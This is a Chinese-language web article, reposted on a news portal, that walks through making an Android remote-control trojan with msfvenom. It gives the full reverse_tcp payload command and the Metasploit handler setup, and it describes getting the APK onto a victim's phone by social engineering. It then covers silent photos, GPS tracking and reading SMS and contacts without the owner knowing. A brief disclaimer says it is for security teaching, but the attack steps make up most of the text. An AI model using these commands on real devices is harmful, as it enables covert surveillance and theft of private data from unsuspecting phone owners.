您的位置: 公众网主页 > 资讯 > 正文 >

安卓手机被kali远控后:实现远程拍照、定位、录音!

发布时间:2021-02-14 04:22:11   来源:互联网   阅读:-

用于网络安全教学,切勿用于不当目的!

大多数情况下,安卓手机在安装了恶意程序后,或多或少都会被远控,那么攻击者在后台通过指令获取目标安卓手机的远程静默拍照、录像、录音、定位、获取通讯录和短信真的是不在话下了,下文我们就来探讨下这种技术。

Msfvenom

Kali中的metasploit有一个工具,名为msfvenom,可以生成众多版本的有效载荷,也就是可执行远控。

比如,我们可以将生成的安卓apk可执行程序经过社工,安装在目标手机中,即可完成长期监听或跟踪。那如何实现呢?这里我们就要用到msfvenom,接下来我们看看使用的方法。

安卓手机被kali远控后:实现远程拍照、定位、录音

生成安卓远控

  • kali终端下输入:
msfvenom -h 查看使用帮助

其中我们要关注的参数是,-p(指定攻击有效载荷)-f(指定生成文件的格式)

msfvenom -l payloads
msfvenom -l formats
  • 生成远控的完整命令:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.31.111 LPORT=8888 R> test.apk

这里没有使用-f参数,生成安卓可执行程序,可以不用。

  • 部署可执行程序

将生成的安卓远控app安装在目标靶机中,可以通过搭建服务器,让目标下载安装apk。

安卓手机被kali远控后:实现远程拍照、定位、录音

使用metasploit进行监听

启动msf

Kali终端下输入:msfconsole

继续输入:

use exploit/multi/handler

本模块专门用于设置独立的连接受理程序,这是我们寻找的最后一块拼图!在这种使用远控载荷的情况下,设置multi/handler是必须的,否则无法进程远程控制。

为该模块设置参数:

show options
set LHOST 192.168.31.111
set lport 8888

这里的设置必须和前面用msfvenom的设置保持一致。

run
执行侦听,等待上线
  • 得到meterpreter会话

一旦目标安卓手机(靶机)用户点击了我们生成的test.apk图标,我们的kali就会监听到连接信号,得到一个远程控制目标(靶机)手机的meterpreter会话。

输入"?"即可显示所有远程控制安卓手机的命令,我们这里选择最精彩的三个:

远程拍照:目标手机不会有任何察觉,属于后台系统拍照;

gps定位:直接显示经纬度地理位置,非常精准;

查看短信与通讯录;

由于平台原因,就不明示写出命令了。如需完整学习安卓嘿客,请进入我头条主页,找到相应专栏加入学习吧!

推荐阅读:南昌在线

(正文已结束)

免责声明及提醒:此文内容为本网所转载企业宣传资讯,该相关信息仅为宣传及传递更多信息之目的,不代表本网站观点,文章真实性请浏览者慎重核实!任何投资加盟均有风险,提醒广大民众投资需谨慎!

上一篇:没有了 下一篇:三大系统拳头产品 2014年平板新品展望!
关于我们 - 联系我们 - XML地图 - 网站地图TXT - 版权声明
Copyright.2002-2021  公众网 版权所有 本网拒绝一切非法行为 欢迎监督举报 如有错误信息 欢迎纠正